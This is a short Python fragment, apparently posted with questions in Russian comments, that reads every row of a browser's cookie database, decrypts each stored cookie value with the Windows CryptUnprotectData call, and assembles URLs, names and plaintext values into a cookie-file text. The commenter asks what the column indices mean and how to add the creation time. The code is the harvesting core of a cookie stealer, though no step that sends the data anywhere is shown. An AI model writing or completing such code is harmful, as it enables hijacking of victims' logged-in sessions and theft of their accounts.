...........................
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode() #никак не пойму почему 12, типа столбец, и 1 к чему?
name = result[2]
url = result[1]
#нужно добавить creation_utc = result ....???
textc += url + "\tTRUE\t" + '/' + '\tFALSE\t'+ str(cookie) + ' | ' + name + ' | ' #здесь не хватает creation_utc ' | ' '\n'